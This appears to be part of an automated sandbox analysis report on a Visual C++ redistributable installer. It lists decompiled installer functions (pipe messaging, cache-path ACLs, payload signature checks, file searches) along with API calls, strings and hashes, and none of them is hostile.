                                                                          0x00028d8a
                                                                          0x00028d8c
                                                                          0x00028ddd
                                                                          0x00028ddf
                                                                          0x00028de1
                                                                          0x00028de3
                                                                          0x00028de4
                                                                          0x00000000
                                                                          0x00028de4
                                                                          0x00028d8e
                                                                          0x00028d97
                                                                          0x00028d99
                                                                          0x00028da1
                                                                          0x00028da3
                                                                          0x00028db1
                                                                          0x00028db6
                                                                          0x00028db7
                                                                          0x00000000
                                                                          0x00028db7
                                                                          0x00028d6a
                                                                          0x00028d6a
                                                                          0x00028d6b
                                                                          0x00000000
                                                                          0x00028d6b
                                                                          0x00028d49
                                                                          0x00028d49
                                                                          0x00028d4a
                                                                          0x00000000
                                                                          0x00028d4a
                                                                          0x00028d28
                                                                          0x00028d28
                                                                          0x00028d29
                                                                          0x00000000
                                                                          0x00028d29
                                                                          0x00028d07
                                                                          0x00028d07
                                                                          0x00028d08
                                                                          0x00028de9
                                                                          0x00028de9
                                                                          0x00028dea
                                                                          0x00028def
                                                                          0x00028df9
                                                                          0x00028e01
                                                                          0x00028e01
                                                                          0x00028e07
                                                                          0x00028e0a
                                                                          0x00028e0d
                                                                          0x00028e11
                                                                          0x00028e11
                                                                          0x00028e16
                                                                          0x00028e19
                                                                          0x00028e19
                                                                          0x00028e30

                                                                          APIs
                                                                          • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 00028E01
                                                                          Strings
                                                                          • Failed to secure cache path: %ls, xrefs: 00028DE4
                                                                          • Failed to allocate access for Users group to path: %ls, xrefs: 00028D6B
                                                                          • Failed to allocate access for Everyone group to path: %ls, xrefs: 00028D4A
                                                                          • cache.cpp, xrefs: 00028DAC
                                                                          • Failed to allocate access for Administrators group to path: %ls, xrefs: 00028D08
                                                                          • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 00028D29
                                                                          • Failed to create ACL to secure cache path: %ls, xrefs: 00028DB7
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLocal
                                                                          • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
                                                                          • API String ID: 2826327444-4113288589
                                                                          • Opcode ID: 68d0d6d61769c85615cc7b2cd8ea380f12b897f603611040b4238711a61024ad
                                                                          • Instruction ID: 6ca151ac05983e5e4ee0460ea95be61a8ad3324ac1f022edb2357cf63b105d2d
                                                                          • Opcode Fuzzy Hash: 68d0d6d61769c85615cc7b2cd8ea380f12b897f603611040b4238711a61024ad
                                                                          • Instruction Fuzzy Hash: B341F675E42239B6EB3196609C46FEF7BACEF50710F418065FA08BA1C2DE619D48C7E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002473A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 115fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E0002473A(void* _a4, signed int* _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				void* _t26;
				int _t30;
				long _t31;
				void* _t34;
				signed short _t41;
				void* _t43;
				signed int _t44;
				signed int* _t48;
				signed int _t49;

				_t49 = 0;
				_v16 = _v16 & 0;
				_v12 = _v12 & 0;
				_v8 = _v8 & 0;
				_t43 = 0;
				do {
					_push(0);
					_push( &_v8);
					_t26 = 8;
					_t30 = ReadFile(_a4,  &_v16 + _t43, _t26 - _t43, ??, ??);
					_t48 = _a8;
					if(_t30 != 0) {
						goto L6;
					} else {
						_t41 = GetLastError();
						if(_t41 != 0xea) {
							if(_t41 == 0x6d) {
								_t44 = 0;
								_t31 = 0;
								_v16 = 0;
								_v12 = 0;
								_t49 = 1;
								L8:
								 *_t48 = _t44;
								_t48[1] = _t31;
								if(_t31 != 0) {
									_t34 = E000138D4(_t31, 0);
									_t48[3] = _t34;
									if(_t34 != 0) {
										if(ReadFile(_a4, _t34, _t48[1],  &_v8, 0) != 0) {
											_t48[2] = 1;
										} else {
											_t53 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
											_t49 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
											E000137D3(0x80004005, "pipe.cpp", 0x327, _t49);
											_push("Failed to read data for message.");
											goto L12;
										}
									} else {
										_t49 = 0x8007000e;
										E000137D3(_t34, "pipe.cpp", 0x323, 0x8007000e);
										_push("Failed to allocate data for message.");
										goto L12;
									}
								}
							} else {
								_t49 =  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000;
								if(_t49 < 0) {
									E000137D3(_t41, "pipe.cpp", 0x318, _t49);
									_push("Failed to read message from pipe.");
									L12:
									_push(_t49);
									E0005012F();
								} else {
									goto L6;
								}
							}
						} else {
							_t49 = 0;
							goto L6;
						}
					}
					if(_t48[2] == 0 && _t48[3] != 0) {
						E00013999(_t48[3]);
					}
					return _t49;
					L6:
					_t43 = _t43 + _v8;
				} while (_t43 < 8);
				_t31 = _v12;
				_t44 = _v16;
				goto L8;
			}















                                                                          0x00024742
                                                                          0x00024744
                                                                          0x00024747
                                                                          0x0002474a
                                                                          0x0002474d
                                                                          0x00024750
                                                                          0x00024750
                                                                          0x00024755
                                                                          0x00024758
                                                                          0x00024765
                                                                          0x0002476b
                                                                          0x00024770
                                                                          0x00000000
                                                                          0x00024772
                                                                          0x00024772
                                                                          0x0002477d
                                                                          0x00024786
                                                                          0x000247ff
                                                                          0x00024801
                                                                          0x00024805
                                                                          0x00024808
                                                                          0x0002480b
                                                                          0x000247a8
                                                                          0x000247a8
                                                                          0x000247aa
                                                                          0x000247af
                                                                          0x000247b8
                                                                          0x000247bd
                                                                          0x000247c2
                                                                          0x00024823
                                                                          0x0002485a
                                                                          0x00024825
                                                                          0x00024836
                                                                          0x00024840
                                                                          0x0002484e
                                                                          0x00024853
                                                                          0x00000000
                                                                          0x00024853
                                                                          0x000247c4
                                                                          0x000247c4
                                                                          0x000247d4
                                                                          0x000247d9
                                                                          0x00000000
                                                                          0x000247d9
                                                                          0x000247c2
                                                                          0x00024788
                                                                          0x00024793
                                                                          0x00024798
                                                                          0x000247eb
                                                                          0x000247f0
                                                                          0x000247f5
                                                                          0x000247f5
                                                                          0x000247f6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00024798
                                                                          0x0002477f
                                                                          0x0002477f
                                                                          0x00000000
                                                                          0x0002477f
                                                                          0x0002477d
                                                                          0x00024865
                                                                          0x00024870
                                                                          0x00024870
                                                                          0x0002487d
                                                                          0x0002479a
                                                                          0x0002479a
                                                                          0x0002479d
                                                                          0x000247a2
                                                                          0x000247a5
                                                                          0x00000000

                                                                          APIs
                                                                          • ReadFile.KERNEL32(00000000,?,00000008,00014740,00000000,?,00000000,00000000,?,00000000,00014740,?,?,00000000,?,00000000), ref: 00024765
                                                                          • GetLastError.KERNEL32 ref: 00024772
                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 0002481B
                                                                          • GetLastError.KERNEL32 ref: 00024825
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastRead
                                                                          • String ID: @Met$Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
                                                                          • API String ID: 1948546556-3410827865
                                                                          • Opcode ID: cefbc7355b0cca5778f415fe8588e0b0ef14754e714ccff9dcfc79669846df89
                                                                          • Instruction ID: 62bac267be5a7fdf36f983e451876103692d37a5fd892599ebd6c1a6596b2148
                                                                          • Opcode Fuzzy Hash: cefbc7355b0cca5778f415fe8588e0b0ef14754e714ccff9dcfc79669846df89
                                                                          • Instruction Fuzzy Hash: D631F272A54339BBEB209BA5EC45BAEF7A9EF01711F108129F811E6180DB749E408BD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000251E9 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 90synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 38%
                                                                          			E000251E9(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _t45;
				void* _t48;

				_t39 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t48 = E0004F7B2( &_v12,  &_v8, _a8);
				if(_t48 >= 0) {
					_t48 = E0004F7B2( &_v12,  &_v8, _a12);
					if(_t48 >= 0) {
						_t45 = _a4;
						if( *((intOrPtr*)(_t45 + 0x14)) == 0xffffffff) {
							L8:
							_t48 = E00024880(_t39,  *((intOrPtr*)(_t45 + 0x10)), 0xf0000003, _v12, _v8);
							if(_t48 >= 0) {
								if( *(_t45 + 0xc) != 0 && WaitForSingleObject( *(_t45 + 0xc), 0x2bf20) == 0xffffffff) {
									_t52 =  <=  ? GetLastError() : _t30 & 0x0000ffff | 0x80070000;
									_t48 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t30 & 0x0000ffff | 0x80070000;
									E000137D3(0x80004005, "pipe.cpp", 0x242, _t48);
									_push("Failed to wait for child process exit.");
									goto L13;
								}
							} else {
								_push("Failed to post terminate message to child process.");
								goto L13;
							}
						} else {
							_t48 = E00024880(_t39,  *((intOrPtr*)(_t45 + 0x14)), 0xf0000003, _v12, _v8);
							if(_t48 >= 0) {
								goto L8;
							} else {
								_push("Failed to post terminate message to child process cache thread.");
								L13:
								_push(_t48);
								E0005012F();
							}
						}
					} else {
						_push("Failed to write restart to message buffer.");
						goto L2;
					}
				} else {
					_push("Failed to write exit code to message buffer.");
					L2:
					_push(_t48);
					E0005012F();
				}
				return _t48;
			}







                                                                          0x000251e9
                                                                          0x000251ec
                                                                          0x000251ed
                                                                          0x000251ee
                                                                          0x000251f5
                                                                          0x00025207
                                                                          0x0002520b
                                                                          0x0002522f
                                                                          0x00025233
                                                                          0x0002523e
                                                                          0x0002524a
                                                                          0x00025268
                                                                          0x00025277
                                                                          0x0002527b
                                                                          0x00025288
                                                                          0x000252ae
                                                                          0x000252b8
                                                                          0x000252c6
                                                                          0x000252cb
                                                                          0x00000000
                                                                          0x000252cb
                                                                          0x0002527d
                                                                          0x0002527d
                                                                          0x00000000
                                                                          0x0002527d
                                                                          0x0002524c
                                                                          0x0002525b
                                                                          0x0002525f
                                                                          0x00000000
                                                                          0x00025261
                                                                          0x00025261
                                                                          0x000252d0
                                                                          0x000252d0
                                                                          0x000252d1
                                                                          0x000252d7
                                                                          0x0002525f
                                                                          0x00025235
                                                                          0x00025235
                                                                          0x00000000
                                                                          0x00025235
                                                                          0x0002520d
                                                                          0x0002520d
                                                                          0x00025212
                                                                          0x00025212
                                                                          0x00025213
                                                                          0x00025219
                                                                          0x000252e0

                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,00015386,00000000,00000000,?,00000000), ref: 00025292
                                                                          • GetLastError.KERNEL32(?,?,?,00014B5B,?,?,00000000,?,?,?,?,?,?,0005B490,?,?), ref: 0002529D
                                                                          Strings
                                                                          • Failed to post terminate message to child process., xrefs: 0002527D
                                                                          • Failed to wait for child process exit., xrefs: 000252CB
                                                                          • Failed to write exit code to message buffer., xrefs: 0002520D
                                                                          • pipe.cpp, xrefs: 000252C1
                                                                          • Failed to post terminate message to child process cache thread., xrefs: 00025261
                                                                          • Failed to write restart to message buffer., xrefs: 00025235
                                                                          • @Met, xrefs: 0002529D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastObjectSingleWait
                                                                          • String ID: @Met$Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                          • API String ID: 1211598281-3681422729
                                                                          • Opcode ID: a58fb3930131d2d1637a2d3e22cbe4b542fbc80d65580a37490ac3ac73abdb02
                                                                          • Instruction ID: a835de5c42e67a6417e5d34e37b1f4d82a9d86799f22e75fb18ef366449635de
                                                                          • Opcode Fuzzy Hash: a58fb3930131d2d1637a2d3e22cbe4b542fbc80d65580a37490ac3ac73abdb02
                                                                          • Instruction Fuzzy Hash: 4921E632941B39FBDB125A94AC02ADF77B8EF01722F110321F900B61D1D735AD549AE8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00028E92 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 88fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E00028E92(void* __edx, intOrPtr* _a4, WCHAR* _a8) {
				void* _t22;
				void* _t23;
				intOrPtr* _t25;
				struct _SECURITY_ATTRIBUTES* _t27;

				_t23 = __edx;
				_t27 = 0;
				_t22 = CreateFileW(_a8, 0x80000000, 5, 0, 3, 0x8000000, 0);
				if(_t22 != 0xffffffff) {
					L5:
					_t25 = _a4;
					__eflags =  *((intOrPtr*)(_t25 + 0x20));
					if( *((intOrPtr*)(_t25 + 0x20)) == 0) {
						__eflags =  *((intOrPtr*)(_t25 + 0x1c));
						if( *((intOrPtr*)(_t25 + 0x1c)) == 0) {
							__eflags =  *((intOrPtr*)(_t25 + 0x30));
							if(__eflags == 0) {
								L15:
								__eflags = _t22 - 0xffffffff;
								if(_t22 != 0xffffffff) {
									CloseHandle(_t22);
								}
								L17:
								return _t27;
							}
							_t27 = E00028F8E(_t23, __eflags,  *((intOrPtr*)(_t25 + 0x30)),  *((intOrPtr*)(_t25 + 0x34)), _a8, _t22);
							__eflags = _t27;
							if(_t27 >= 0) {
								goto L15;
							}
							_push( *_t25);
							_push("Failed to verify hash of payload: %ls");
							L14:
							_push(_t27);
							E0005012F();
							goto L15;
						}
						_t27 = E000291F7(_t23, _t25, _a8, _t22);
						__eflags = _t27;
						if(_t27 >= 0) {
							goto L15;
						}
						_push( *_t25);
						_push("Failed to verify catalog signature of payload: %ls");
						goto L14;
					}
					_t27 = E0002A998(_t23, _t25, _a8, _t22);
					__eflags = _t27;
					if(_t27 >= 0) {
						goto L15;
					}
					_push( *_t25);
					_push("Failed to verify signature of payload: %ls");
					goto L14;
				}
				_t27 =  <=  ? GetLastError() : _t19 & 0x0000ffff | 0x80070000;
				if(_t27 != 0x80070003 && _t27 != 0x80070002) {
					if(_t27 >= 0) {
						goto L5;
					}
					E000137D3(_t19, "cache.cpp", 0x5ba, _t27);
					E0005012F(_t27, "Failed to open payload at path: %ls", _a8);
				}
			}







                                                                          0x00028e92
                                                                          0x00028e97
                                                                          0x00028eb2
                                                                          0x00028eb7
                                                                          0x00028f0c
                                                                          0x00028f0d
                                                                          0x00028f10
                                                                          0x00028f14
                                                                          0x00028f2f
                                                                          0x00028f33
                                                                          0x00028f4e
                                                                          0x00028f52
                                                                          0x00028f79
                                                                          0x00028f7a
                                                                          0x00028f7d
                                                                          0x00028f80
                                                                          0x00028f80
                                                                          0x00028f86
                                                                          0x00028f8b
                                                                          0x00028f8b
                                                                          0x00028f63
                                                                          0x00028f65
                                                                          0x00028f67
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00028f69
                                                                          0x00028f6b
                                                                          0x00028f70
                                                                          0x00028f70
                                                                          0x00028f71
                                                                          0x00000000
                                                                          0x00028f76
                                                                          0x00028f3f
                                                                          0x00028f41
                                                                          0x00028f43
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00028f45
                                                                          0x00028f47
                                                                          0x00000000
                                                                          0x00028f47
                                                                          0x00028f20
                                                                          0x00028f22
                                                                          0x00028f24
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00028f26
                                                                          0x00028f28
                                                                          0x00000000
                                                                          0x00028f28
                                                                          0x00028eca
                                                                          0x00028ed3
                                                                          0x00028ee7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00028ef4
                                                                          0x00028f02
                                                                          0x00028f07

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00029CFF,00000003,000007D0,00000003,?,000007D0), ref: 00028EAC
                                                                          • GetLastError.KERNEL32(?,00029CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000000,-00000004), ref: 00028EB9
                                                                          • CloseHandle.KERNEL32(00000000,?,00029CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000000), ref: 00028F80
                                                                          Strings
                                                                          • Failed to open payload at path: %ls, xrefs: 00028EFC
                                                                          • Failed to verify signature of payload: %ls, xrefs: 00028F28
                                                                          • Failed to verify catalog signature of payload: %ls, xrefs: 00028F47
                                                                          • cache.cpp, xrefs: 00028EEF
                                                                          • Failed to verify hash of payload: %ls, xrefs: 00028F6B
                                                                          • @Met, xrefs: 00028EB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: @Met$Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                          • API String ID: 2528220319-499153605
                                                                          • Opcode ID: 7bc1cd10104afcc362edcc5231e21c68b3fde6f4e846590c6dd4a525bd2de4e6
                                                                          • Instruction ID: fef903604bc6520897dcf580292e864328ad8d13f17f0ef4899f9852b522070c
                                                                          • Opcode Fuzzy Hash: 7bc1cd10104afcc362edcc5231e21c68b3fde6f4e846590c6dd4a525bd2de4e6
                                                                          • Instruction Fuzzy Hash: 492147396016317BD7A21A64AD49B9F7B5BBF04361F008220FD046A191DB359C609BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000169B8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 55%
                                                                          			E000169B8(void* __ebx, void* __edx, intOrPtr _a8) {
				signed int _v8;
				short _v528;
				char _v1048;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				WCHAR* _t19;
				signed short _t25;
				signed short _t28;
				void* _t31;
				void* _t36;
				intOrPtr _t39;
				void* _t40;
				signed int _t47;

				_t36 = __edx;
				_t31 = __ebx;
				_t10 =  *0x7a008; // 0xfbf51acb
				_v8 = _t10 ^ _t47;
				_t39 = _a8;
				E0003F670(0x208,  &_v528, 0, 0x208);
				E0003F670(0x208,  &_v1048, 0, 0x208);
				if(GetWindowsDirectoryW( &_v528, 0x104) != 0) {
					_t19 =  &_v528;
					__imp__GetVolumePathNameW(_t19,  &_v1048, 0x104);
					if(_t19 != 0) {
						_t40 = E000302F4(_t39,  &_v1048, 0);
						if(_t40 < 0) {
							_push("Failed to set variant value.");
							goto L6;
						}
					} else {
						_t25 = GetLastError();
						_t43 =  <=  ? _t25 : _t25 & 0x0000ffff | 0x80070000;
						_t40 =  >=  ? 0x80004005 :  <=  ? _t25 : _t25 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "variable.cpp", 0x7b4, _t40);
						_push("Failed to get volume path name.");
						goto L6;
					}
				} else {
					_t28 = GetLastError();
					_t46 =  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
					_t40 =  >=  ? 0x80004005 :  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "variable.cpp", 0x7ae, _t40);
					_push("Failed to get windows directory.");
					L6:
					_push(_t40);
					E0005012F();
				}
				return E0003DE36(_t31, _v8 ^ _t47, _t36, 0x104, _t40);
			}


















                                                                          0x000169b8
                                                                          0x000169b8
                                                                          0x000169c1
                                                                          0x000169c8
                                                                          0x000169cc
                                                                          0x000169df
                                                                          0x000169ee
                                                                          0x00016a0b
                                                                          0x00016a4a
                                                                          0x00016a51
                                                                          0x00016a59
                                                                          0x00016a9f
                                                                          0x00016aa3
                                                                          0x00016aa5
                                                                          0x00000000
                                                                          0x00016aa5
                                                                          0x00016a5b
                                                                          0x00016a5b
                                                                          0x00016a6c
                                                                          0x00016a76
                                                                          0x00016a84
                                                                          0x00016a89
                                                                          0x00000000
                                                                          0x00016a89
                                                                          0x00016a0d
                                                                          0x00016a0d
                                                                          0x00016a1e
                                                                          0x00016a28
                                                                          0x00016a36
                                                                          0x00016a3b
                                                                          0x00016aaa
                                                                          0x00016aaa
                                                                          0x00016aab
                                                                          0x00016ab1
                                                                          0x00016ac3

                                                                          APIs
                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00016A03
                                                                          • GetLastError.KERNEL32 ref: 00016A0D
                                                                          • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00016A51
                                                                          • GetLastError.KERNEL32 ref: 00016A5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                          • String ID: @Met$Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 124030351-2161497863
                                                                          • Opcode ID: a88f4c3c981d7b49c49f1f3d381756d1425de637208ed56a2d85feacf5733445
                                                                          • Instruction ID: 94b57139c571407bfa5d87413d565f5a1afb2879d294c2def1715c3d9cd9c098
                                                                          • Opcode Fuzzy Hash: a88f4c3c981d7b49c49f1f3d381756d1425de637208ed56a2d85feacf5733445
                                                                          • Instruction Fuzzy Hash: BE21C772F407286AE720A6A59C46FEB77ECDF40711F014166FE05F7181EA349D848AA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00019B3F Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E00019B3F(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed char _t18;
				intOrPtr _t19;
				signed short _t24;
				intOrPtr _t29;
				void* _t34;

				_v8 = _v8 & 0x00000000;
				_t33 = _a4;
				_t34 = E000171CF(_a8,  *((intOrPtr*)(_a4 + 0x14)),  &_v8, 0);
				if(_t34 >= 0) {
					_t18 = GetFileAttributesW(_v8);
					if(_t18 != 0xffffffff) {
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0xc], xmm0");
						if((_t18 & 0x00000010) != 0) {
							goto L9;
						} else {
							_t29 = 1;
							_t19 = 0;
							goto L10;
						}
						L16:
					} else {
						_t24 = GetLastError();
						if(_t24 == 2 || _t24 == 3) {
							_push(_v8);
							E0005061A(2, "File search: %ls, did not find path: %ls",  *_t33);
							goto L8;
						} else {
							if(_t24 == 0) {
								L8:
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0xc], xmm0");
								L9:
								_t29 = _v16;
								_t19 = _v12;
								L10:
								_t34 = E00018152(_a8,  *((intOrPtr*)(_t33 + 4)), _t29, _t19, 0);
								if(_t34 < 0) {
									_push("Failed to set variable.");
									goto L12;
								}
							} else {
								_t37 =  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
								_t34 =  >=  ? 0x80004005 :  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
								E000137D3(0x80004005, "search.cpp", 0x28b, _t34);
								E0005012F(_t34, "Failed get to file attributes. \'%ls\'",  *((intOrPtr*)(_t33 + 0x14)));
							}
						}
					}
				} else {
					_push("Failed to format variable string.");
					L12:
					_push(_t34);
					E0005012F();
				}
				E00012793(_v8);
				return _t34;
				goto L16;
			}











                                                                          0x00019b45
                                                                          0x00019b4e
                                                                          0x00019b5f
                                                                          0x00019b63
                                                                          0x00019b72
                                                                          0x00019b7b
                                                                          0x00019c26
                                                                          0x00019c29
                                                                          0x00019c30
                                                                          0x00000000
                                                                          0x00019c32
                                                                          0x00019c34
                                                                          0x00019c35
                                                                          0x00000000
                                                                          0x00019c35
                                                                          0x00000000
                                                                          0x00019b81
                                                                          0x00019b81
                                                                          0x00019b8a
                                                                          0x00019bd0
                                                                          0x00019bdc
                                                                          0x00000000
                                                                          0x00019b91
                                                                          0x00019b93
                                                                          0x00019be4
                                                                          0x00019be4
                                                                          0x00019be7
                                                                          0x00019bec
                                                                          0x00019bec
                                                                          0x00019bef
                                                                          0x00019bf2
                                                                          0x00019c01
                                                                          0x00019c05
                                                                          0x00019c07
                                                                          0x00000000
                                                                          0x00019c07
                                                                          0x00019b95
                                                                          0x00019ba0
                                                                          0x00019baa
                                                                          0x00019bb8
                                                                          0x00019bc6
                                                                          0x00019bcb
                                                                          0x00019b93
                                                                          0x00019b8a
                                                                          0x00019b65
                                                                          0x00019b65
                                                                          0x00019c0c
                                                                          0x00019c0c
                                                                          0x00019c0d
                                                                          0x00019c13
                                                                          0x00019c17
                                                                          0x00019c23
                                                                          0x00000000

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019B5A
                                                                          • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 00019B72
                                                                          • GetLastError.KERNEL32 ref: 00019B81
                                                                          Strings
                                                                          • Failed to set variable., xrefs: 00019C07
                                                                          • Failed to format variable string., xrefs: 00019B65
                                                                          • File search: %ls, did not find path: %ls, xrefs: 00019BD5
                                                                          • search.cpp, xrefs: 00019BB3
                                                                          • Failed get to file attributes. '%ls', xrefs: 00019BC0
                                                                          • @Met, xrefs: 00019B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLastOpen@16
